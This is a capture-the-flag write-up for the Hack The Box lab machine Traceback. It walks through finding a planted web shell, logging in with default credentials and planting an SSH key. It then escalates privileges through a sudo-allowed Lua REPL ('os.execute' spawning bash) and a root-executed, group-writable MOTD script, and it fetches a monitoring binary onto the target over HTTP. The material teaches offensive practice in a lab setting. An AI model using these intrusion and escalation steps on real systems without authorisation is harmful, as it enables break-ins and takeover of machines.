Writeup HTB - machines - traceback

In this serie, we will see how to solve Hack The Box machines. This writeup is related to the retired machine named traceback.

If you see dates like 2020-07-09 it is because I’ve owned this box on July and it was recently retired, so I’m releasing my solution afterwards.

Basic scan

The following nmap scan displays 2 open ports:

nmap -sC -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 17:39 CEST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 17:39 (0:00:06 remaining)
Nmap scan report for 10.10.10.181
Host is up (0.092s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.33 seconds

HTTP check

A message is displayed. It seems that a backdoor is present.

This site has been owned
I have left a backdoor for all the net.
FREE INTERNETZZZ
- Xh4H -

By checking the HTML source code, a comment is written.

<!--Some of the best web shells that you might need ;)-->

I’ve checked out this sentence on the Internet. It redirects me to this GitHub repository. It’s some web shells.

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

Let’s save them into web_shells.txt file.

File browsing

gobuster dir -u http://10.10.10.181/ -w web_shells.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181/
[+] Threads:        10
[+] Wordlist:       webshells.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/09 17:46:45 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/07/09 17:46:47 Finished
===============================================================

The web shell smevk.php seems to exist.

In the source code, we can see:

$UserName = "admin";
$auth_pass = "admin";

It seems that an authentication is required. By browsing http://10.10.10.181/smevk.php, we can see a login page. By filling admin for username input and admin for password input, we drop on the web shell.

Great, we have access to the filesystem.

Exploitation

In the top left of this web shell, we see that the HTTP server is executed with webadmin user. The first idea is to create a SSH key pair on my local workstation, copy the public key into /home/webadmin/.ssh/authorized_keys and try to connect.

Generate the SSH key pair

ssh-keygen -t ed25519 -a 100 -f ~/.ssh/traceback -C webadmin
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:eX5OOu8M09t+UebHWtuNmS78TtPlEmNDiNrPECIeOtM ap@lap-001-1
The key's randomart image is:
+--[ED25519 256]--+
|                 |
|           . .   |
|      o . o . .  |
|     + o = . .  o|
|    + E S +   =+o|
|     o   o = . B*|
|          +.* +*O|
|          .Oo+=++|
|          .+***. |
+----[SHA256]-----+

You can set a passphrase, but we don’t really need it… Copy traceback.pub into authorized_keys file.

Try to connect

ssh webadmin@10.10.10.181 -i .ssh/traceback
The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jul 10 05:23:57 2020 from 10.10.14.186
webadmin@traceback:~$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

We are connected to the machine as webadmin user!

Privilege escalation

The first thing that surprises me is that the MOTD (Message Of The Day) is different than usual… It might be interesting. Also, a file named note.txt informs us that a tool written in Lua has been left on the system to practice Lua.

webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

By habits, I always check what the command sudo can do.

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

We can use sudo without using password with user sysadmin to execute the file located at /home/sysadmin/luvit.

Luvit is a binary that contains the Lua virtual machine, libuv, openssl, miniz as well as a host of standard libraries implemented in Lua that closely looks like the public Node.js APIs.

REPL is an implementation of a Read-Eval-Print-Loop in Luvit.

Thanks to the great GTFOBins, we can search exploits with the lua binary.

The goal of this privilege escalation is to execute /bin/bash with os.execute library.

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit
Welcome to the Luvit repl!
> os.execute('/bin/bash -i')
sysadmin@traceback:~$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

I have executed /bin/bash (with -i to make bash interactive) with sysadmin rights! I’m now sysadmin user!

User flag

Let’s have a look at the home directory of the sysadmin user.

sysadmin@traceback:~$ cd /home/sysadmin/
sysadmin@traceback:/home/sysadmin$ ls
luvit  user.txt
sysadmin@traceback:/home/sysadmin$ cat user.txt
c0423a266ceb####################

Root flag

Earlier, I told you to keep in mind that the MOTD has been changed. Let’s have a look at this file. Generally, it’s located at /etc/update-motd.d/.

sysadmin@traceback:/home/sysadmin$ ls -lah /etc/update-motd.d/
total 32K
drwxr-xr-x  2 root sysadmin 4.0K Aug 27  2019 .
drwxr-xr-x 80 root root     4.0K Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Jul 10 06:35 00-header
-rwxrwxr-x  1 root sysadmin  982 Jul 10 06:35 10-help-text
-rwxrwxr-x  1 root sysadmin 4.2K Jul 10 06:35 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Jul 10 06:35 80-esm
-rwxrwxr-x  1 root sysadmin  299 Jul 10 06:35 91-release-upgrade

We can write into these files. Let’s check the content of 00-header file (some lines have been withdrawn).

echo "\nWelcome to Xh4H land \n"

The content above is displayed when the SSH connection is granted. If we put something into this file, it’s going to be executed with root right.

I know that the root flag is located at /root/root.txt. We can add the following code into the previous file.

/usr/bin/cat /root/root.txt

By saving this file, you can have a message telling you that the file has been modified since reading it. We have to understand what is going on under the hood.

The best way to do this is to enumerate the system processes in real time (like a tail -f on the system processes).

On your local workstation, download pspy64s, a tool to monitor GNU/Linux processes without root permissions.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
python -m http.server 8000

On the machine, retrieve the file.

wget http://10.10.14.60:8000/pspy64s
chmod +x pspy64s
./pspy64s

The program pspy64s reveals that the following command is being run on the server every 30 seconds.

/bin/sh -c sleep30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

It is the reason why if you don’t execute the previous tasks quickly (editing the /etc/update-motd.d/00-header file), you’ll encounter error.

Now, if you are quick and you initiate a SSH connection, the flag is displayed in the MOTD.

ap > ssh webadmin@10.10.10.181 -i .ssh/traceback
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

ddb15b9be2d4####################


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jul 10 06:44:36 2020 from 10.10.15.106